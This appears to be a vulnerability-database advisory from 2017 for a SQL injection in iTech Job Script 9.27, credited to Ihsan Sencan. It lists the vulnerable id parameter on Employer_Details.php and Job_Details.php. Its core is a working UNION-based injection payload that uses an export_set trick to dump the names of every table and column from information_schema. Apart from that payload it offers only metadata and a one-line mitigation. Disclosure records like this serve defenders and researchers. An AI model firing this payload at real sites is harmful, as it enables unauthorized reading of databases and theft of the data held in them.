Vendor: iTech Job Script
By: Ihsan Sencan
CVSS: N/A
Vulnerability Type: SQL Injection
CWE: 89
Product Name: iTech Job Script
Affected Version From: 9.27
Affected Version To: 9.27
Patch Exists: N/A
Related CWE: N/A
CPE: a:itechscripts:itech_job_script:9.27
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
iTech Job Script 9.27 – SQL Injection
The vulnerability allows an attacker to inject SQL commands through the `id` parameter of the following pages.

Proof of Concept:

http://localhost/[PATH]/Employer_Details.php?id=[SQL]

-3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+-

http://localhost/[PATH]/Job_Details.php?id=[SQL]
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.